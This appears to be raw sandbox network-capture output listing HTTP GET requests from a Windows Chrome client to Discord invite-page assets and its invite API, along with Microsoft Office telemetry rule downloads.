                          Source: global trafficHTTP traffic detected: GET /assets/af5116b1db004acbdb8b.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/ba88bbd1342d3f000e33.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/822c37e354b4a39dd6ca.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/55ad931ed92a15c15709.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQRange: bytes=102533-102533If-Range: "80f500d4d0495e5c74e9b92cbc26f088"
                          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/9390b4ecf309e4a58642.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/52015caea7357a7a60a9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQRange: bytes=101503-101503If-Range: "2088cf886851cb41b694b6059102a249"
                          Source: global trafficHTTP traffic detected: GET /assets/05bd1eb5dea5ee3387f4.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/2597d11c1e039607373e.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/a5ec2b74d0cc337d4481.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/55ad931ed92a15c15709.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQRange: bytes=102533-109612If-Range: "80f500d4d0495e5c74e9b92cbc26f088"
                          Source: global trafficHTTP traffic detected: GET /assets/5430e9964fe8364e084d.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ab03f7053698d417194c.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/410a2166a48c9e482e2a.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/52015caea7357a7a60a9.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQRange: bytes=101503-168251If-Range: "2088cf886851cb41b694b6059102a249"
                          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/9017b7062734e72bb476.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                          Source: global trafficHTTP traffic detected: GET /assets/af5116b1db004acbdb8b.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /assets/ba88bbd1342d3f000e33.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                          Source: global trafficHTTP traffic detected: GET /api/v9/invites/BNXa5rYFXM?with_counts=true&with_expiration=true HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxIX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                          Source: global trafficHTTP traffic detected: GET /assets/b9995525a52dc58aecf5.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/BNXa5rYFXMAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
